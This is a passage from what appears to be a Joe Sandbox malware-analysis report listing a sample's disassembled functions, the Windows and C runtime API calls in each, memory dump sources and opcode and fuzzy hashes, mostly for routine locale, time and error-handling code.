Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: f15086ef911e980a624ddc0ce715f26d90258319c0f771891c202a52aa79d611
Instruction ID: 58a1b96a0a95a201d4940fe31e519cc4d497370062663e48bc3ab8c60d4ae609
Opcode Fuzzy Hash: f15086ef911e980a624ddc0ce715f26d90258319c0f771891c202a52aa79d611
Instruction Fuzzy Hash: 8B311C32A1CB8682EB648F59E4853AAB3B0FF89744F504135DB8D83A99DF7CD149CB00

Function 0000000180051B00 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000000180051B6F
WriteFile.KERNEL32 ref: 0000000180051E26
WriteFile.KERNEL32 ref: 0000000180051E78
GetLastError.KERNEL32 ref: 0000000180051F7A
GetLastError.KERNEL32 ref: 0000000180051FDA

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: a5da640ba6680b36697e39da6f31f1681296b9511563371275cc4e31a9cc749f
Instruction ID: 3bb89a237922a4dbf199e84966f3211a87544b989fc92ea96746daba362679ae
Opcode Fuzzy Hash: a5da640ba6680b36697e39da6f31f1681296b9511563371275cc4e31a9cc749f
Instruction Fuzzy Hash: 49E1FD32714A848AE742CB65D4803ED7BB1F3497D8F548216FE8A67B99DF39C61AC700

Function 00007FF6B40A4AB4 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6B40A4AEB
GetCurrentProcessId.KERNEL32 ref: 00007FF6B40A4AF6
GetCurrentThreadId.KERNEL32 ref: 00007FF6B40A4B02
GetTickCount.KERNEL32 ref: 00007FF6B40A4B0E
QueryPerformanceCounter.KERNEL32 ref: 00007FF6B40A4B1F

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 258fc2305547ef968ab2953c219a6f995f05de8e1044a39cf637b236cf37cfb4
Instruction ID: ece43a91c68a65d679d0fe7e2ae93dfdecc7494a442ae3e3a008b9de5e0074ba
Opcode Fuzzy Hash: 258fc2305547ef968ab2953c219a6f995f05de8e1044a39cf637b236cf37cfb4
Instruction Fuzzy Hash: CB01843166CA0582EB508F29F8D466A6370FF49B90F446631DF9E877A4CF3CD9858344

Function 0000000180050550 Relevance: 6.1, APIs: 4, Instructions: 149timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 000000018005057E

Part of subcall function 000000018004FA2C: _invalid_parameter_noinfo.LIBCMT ref: 000000018004FA40

_get_daylight.LIBCMT ref: 000000018005058F

Part of subcall function 000000018004F9CC: _invalid_parameter_noinfo.LIBCMT ref: 000000018004F9E0

_get_daylight.LIBCMT ref: 00000001800505A0

Part of subcall function 000000018004F9FC: _invalid_parameter_noinfo.LIBCMT ref: 000000018004FA10

Part of subcall function 000000018004ACBC: HeapFree.KERNEL32 ref: 000000018004ACD2

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000001800507AC), ref: 00000001800505C7

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$FreeHeapInformationTimeZone
String ID:
API String ID: 428190724-0
Opcode ID: eb17ea58bdbc035b070fbdde5e584468cbf3f9864e75ed8c1b52832f19af070f
Instruction ID: c1e5ec7ffb3b0485f5504c76f1f11ddc76eaae3522a8e322d76ee74f9b5d0426
Opcode Fuzzy Hash: eb17ea58bdbc035b070fbdde5e584468cbf3f9864e75ed8c1b52832f19af070f
Instruction Fuzzy Hash: 4B61B032600A48C6E7A2EF21E9817DA77A0FB8C7C4F51C125BA4987B96DF39C648C740

Function 000000018001AD30 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 485COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001AFF8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001B2C4

Strings

%, xrefs: 000000018001B2FE

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: %
API String ID: 3668304517-2567322570
Opcode ID: 4b3272d94f63d4d14bb25f70f67c8605b22abdf6209290660d91289bb19573f4
Instruction ID: 579fef8adc779dc1b2f073e9ee3d8d538ee852a0b2397d919a644fbf4d7e1f46
Opcode Fuzzy Hash: 4b3272d94f63d4d14bb25f70f67c8605b22abdf6209290660d91289bb19573f4
Instruction Fuzzy Hash: 5E12F132708A8889FB66CFA5E4503EE67A1EB5D7C8F448125FE4957B89DF38C649C340

Function 00000001800282E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 483COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800285A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180028875

Strings

%, xrefs: 00000001800288AE

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: %
API String ID: 3668304517-2567322570
Opcode ID: ed4fb1bcc7c20d3f2d8fcf1d71f1839f0d36defa4c4b88494ec84b5d782d82e6
Instruction ID: def163b574a6751cc1fbee04067179f57b3680714b84f256a25275f994b55f61
Opcode Fuzzy Hash: ed4fb1bcc7c20d3f2d8fcf1d71f1839f0d36defa4c4b88494ec84b5d782d82e6
Instruction Fuzzy Hash: F5122136705A888AFB67CFA5E4503EE67A1EB5C7C8F548121EE4917B89DF38C649D300

Function 00000001800501D8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180059E9C: _invalid_parameter_noinfo.LIBCMT ref: 0000000180059ECA

_get_daylight.LIBCMT ref: 00000001800502F5
_get_daylight.LIBCMT ref: 0000000180050306

Strings

?, xrefs: 0000000180050281

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 9ed0399036df985f1c5065c011842846fa428f2e13dfa5801921148c8790c864
Instruction ID: 5401f8dc74a8aae0634478421cbc300e03fdf151a2980a5d0e8abe40aa5caa78
Opcode Fuzzy Hash: 9ed0399036df985f1c5065c011842846fa428f2e13dfa5801921148c8790c864
Instruction Fuzzy Hash: AB91023270065886FBA29F26D4513EE6791E788BD8F60C111FB4857BC5DF3ACA8AC740

Function 00000001800456BC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

_Wcsftime.LIBCMT ref: 000000018004576E
_Wcsftime.LIBCMT ref: 000000018004570F

Part of subcall function 000000018004D184: _invalid_parameter_noinfo.LIBCMT ref: 000000018004D1AF

Strings

25-11 C1, xrefs: 00000001800456CC

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Wcsftime$_invalid_parameter_noinfo
String ID: 25-11 C1
API String ID: 4239037671-2243052442
Opcode ID: 1a1ffa18b777babe2509f13331df77e430f0795b1a9bfb07f31c501696859861
Instruction ID: ebcc98c92cb179285690a7b63216d3a1e7d8d116e817b9bc4623d03469a2569b
Opcode Fuzzy Hash: 1a1ffa18b777babe2509f13331df77e430f0795b1a9bfb07f31c501696859861
Instruction Fuzzy Hash: A171A332204E5882EBA5CE25D4D13AD2360F789BE9F15C626FE6E97796CF34C6458304

Function 000000018004F34C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000018004F385
GetLocaleInfoW.KERNEL32(?,?,?,?,?,000000018004D026), ref: 000000018004F3B3

Strings

GetLocaleInfoEx, xrefs: 000000018004F379

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: InfoLocaletry_get_function
String ID: GetLocaleInfoEx
API String ID: 2200034068-2904428671
Opcode ID: 634770e385f523a436c3b662d55369e4746389118568c5dd86db1eb9e0109819
Instruction ID: 9f47e97ed4584566a9ea23285f4183bc7851548e0f7910907fb27821793fc867
Opcode Fuzzy Hash: 634770e385f523a436c3b662d55369e4746389118568c5dd86db1eb9e0109819
Instruction Fuzzy Hash: 2401D135704B8482E7929B12F8403DAA361F78CBC4F69C026FE5807B56CF38C74A8344

Function 0000000180046850 Relevance: 4.8, APIs: 3, Instructions: 317COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00000001800468B6
memcpy_s.LIBCPMT ref: 00000001800468E1

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: f9a01c3f0eb488e8e09404163d7a92d328876311010a7811337294863dbdb852
Instruction ID: 904b201b74040c2f5993f89ad22c77f5845d84f3e06a12769cb301c7ee0e3089
Opcode Fuzzy Hash: f9a01c3f0eb488e8e09404163d7a92d328876311010a7811337294863dbdb852
Instruction Fuzzy Hash: 4EC14772B14A8987EB75CF19E0C47AAB791F3887C8F45C124EB4A43754EB38DA48CB44

Function 000000018005AC5C Relevance: 4.7, APIs: 3, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 000000018004B450: GetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B45F
Part of subcall function 000000018004B450: SetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B4FD

GetLocaleInfoW.KERNEL32 ref: 000000018005ACC8

Part of subcall function 00000001800553C0: _invalid_parameter_noinfo.LIBCMT ref: 00000001800553DD

GetLocaleInfoW.KERNEL32 ref: 000000018005AD11

Part of subcall function 00000001800553C0: _invalid_parameter_noinfo.LIBCMT ref: 0000000180055436

GetLocaleInfoW.KERNEL32 ref: 000000018005ADDC

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
String ID:
API String ID: 3644580040-0
Opcode ID: 745b66beb0e33e54293f194515aba5724ad7e2d4e56b631f64cfd232bf0e9023
Instruction ID: 44a4da3e0788245664ee3ae620d1a5e117e70ccfb6e5360fc7b82c2fe397efe7
Opcode Fuzzy Hash: 745b66beb0e33e54293f194515aba5724ad7e2d4e56b631f64cfd232bf0e9023
Instruction Fuzzy Hash: B461C1322046498AFBB69F21E4813ED73B1F3897C5F00C125FB9AA3695DF39DA598700

Function 00007FFE1A52E72C Relevance: 4.7, APIs: 3, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A523544: GetLastError.KERNEL32 ref: 00007FFE1A523553
Part of subcall function 00007FFE1A523544: FlsGetValue.KERNEL32 ref: 00007FFE1A523568
Part of subcall function 00007FFE1A523544: SetLastError.KERNEL32 ref: 00007FFE1A5235F3

Part of subcall function 00007FFE1A523544: FlsSetValue.KERNEL32 ref: 00007FFE1A523589

GetLocaleInfoW.KERNEL32 ref: 00007FFE1A52E798

Part of subcall function 00007FFE1A52C374: _invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A52C391

GetLocaleInfoW.KERNEL32 ref: 00007FFE1A52E7E1

Part of subcall function 00007FFE1A52C374: _invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A52C3EA

GetLocaleInfoW.KERNEL32 ref: 00007FFE1A52E8A9

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
String ID:
API String ID: 1791019856-0
Opcode ID: 1c6ef0b484e3df7248867cb1abf1e4245feb3ef5132214e1665b3675c2657567
Instruction ID: 374ae1ef0a587dd78b777b19b7fe9d7f69d16e2d99080194ee1625ac16dbfcf7
Opcode Fuzzy Hash: 1c6ef0b484e3df7248867cb1abf1e4245feb3ef5132214e1665b3675c2657567
Instruction Fuzzy Hash: E461AEB2B0C942D6EB748F52E4402B967A2FB86F60F4081B7DB9D936A1DE3CE451D700

Function 00007FF6B40A94B8 Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6B40A94F7
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6B40A953D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6B40A9548

Part of subcall function 00007FF6B40A3C74: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF6B40A3ED0,?,?,?,?,00007FF6B40A5D5D,?,?,00000000,00007FF6B40A6748), ref: 00007FF6B40A3D37

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
String ID:
API String ID: 2731829486-0
Opcode ID: 52a6a7ed5fcc94a6281fe3546a0000142b0e9471448b67b1f948f892416a3f87
Instruction ID: 9ae8f60690069d9f61e7746bb67b5e61bdb55daf2a3e9f4a9550a2d42db3da38
Opcode Fuzzy Hash: 52a6a7ed5fcc94a6281fe3546a0000142b0e9471448b67b1f948f892416a3f87
Instruction Fuzzy Hash: 9E014025A1CA8642F6649F58E4993BA67A0FFC5304F440135DB8E86A95DF3CE5048B01

Function 00000001800569C8 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

0QK, xrefs: 0000000180056A22, 0000000180056A77, 0000000180056AC3, 0000000180056B05, 0000000180056D7B

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID: 0QK
API String ID: 0-2575616143
Opcode ID: 468bc347a50b9d598544329f1ad376ff129b6a5105a6dcc0704d0e940da8eb3f
Instruction ID: 103dcbe3b0caf0aad6fb2613836a5a862e21f3588560941de5b49e5ca50511f3
Opcode Fuzzy Hash: 468bc347a50b9d598544329f1ad376ff129b6a5105a6dcc0704d0e940da8eb3f
Instruction Fuzzy Hash: 4A02E231B05A4C41FEE39B15A8453E92694BB0DBE4F49C625BE79673E1DF3ACB098304

Function 000000018004B760 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018004B7C4

Strings

gfffffff, xrefs: 000000018004BA75

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: a68aa7c543f807b48cc7f74ede452b571324c08b296b3628ca316ab1f2df07f7
Instruction ID: 3137c63eaa172de737c6fc231bde14d6f5ef0f8df95d741a5d32bfb24a9f16ad
Opcode Fuzzy Hash: a68aa7c543f807b48cc7f74ede452b571324c08b296b3628ca316ab1f2df07f7
Instruction Fuzzy Hash: DE913973705BC886EF96CF2994907E97B94E759BC8F06C026EE4987781DE39C60AC701

Function 000000018004C16C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018004C1A2

Part of subcall function 00000001800415F8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00000001800415A5), ref: 0000000180041601
Part of subcall function 00000001800415F8: GetCurrentProcess.KERNEL32(?,?,?,?,00000001800415A5), ref: 0000000180041626

Strings

-, xrefs: 000000018004C394

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID: -
API String ID: 4036615347-2547889144
Opcode ID: 6cc5e513b45f2876cf9bac4ea1f9130143244a8e214867aa563e544db10fe33a
Instruction ID: abc74eb9e73861cf7fd2379a708d1010edad5f1d918d6bef5ea59eb6e8891e86
Opcode Fuzzy Hash: 6cc5e513b45f2876cf9bac4ea1f9130143244a8e214867aa563e544db10fe33a
Instruction Fuzzy Hash: 70914772304B8886E7F1CB259580BA9B791F78DBD8F428215FA9943F99CF7CC6048705

Function 0000000180055544 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180055574

Part of subcall function 00000001800415F8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00000001800415A5), ref: 0000000180041601
Part of subcall function 00000001800415F8: GetCurrentProcess.KERNEL32(?,?,?,?,00000001800415A5), ref: 0000000180041626

Strings

*?, xrefs: 000000018005559B

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID: *?
API String ID: 4036615347-2564092906
Opcode ID: ace8fc75b6a4f5f9c983efe07649f7ef6a2f84c765c2dcdb195ac0e41aaf3322
Instruction ID: 54f79df464e42c134b12a8c444b807f0a4e6bd593d6a3989d897b0465145360f
Opcode Fuzzy Hash: ace8fc75b6a4f5f9c983efe07649f7ef6a2f84c765c2dcdb195ac0e41aaf3322
Instruction Fuzzy Hash: 97510372710F9885EF52CFA298213E927A1F74CBD8F858522FE5927B85EE39C1098300

Function 00007FFE1A528048 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FFE1A52429A), ref: 00007FFE1A5280BC

Strings

GetLocaleInfoEx, xrefs: 00007FFE1A528064, 00007FFE1A528075

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: e351ca0c260fd6f7cc339703de614c20f8b1110d3d38d412e789d35ffe6594d1
Instruction ID: ca9c2700407f5d0676232b7bf368b5629cd4d70123a89bb8240742a69a593e8a
Opcode Fuzzy Hash: e351ca0c260fd6f7cc339703de614c20f8b1110d3d38d412e789d35ffe6594d1
Instruction Fuzzy Hash: B9011A25B0CA8185E7099B97B8404BAA661EF9AFE0F5840F7EE4D13B65CE3CD5458780

Function 000000018004E52C Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 000000018004E77B
RaiseException.KERNEL32 ref: 000000018004E78C

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

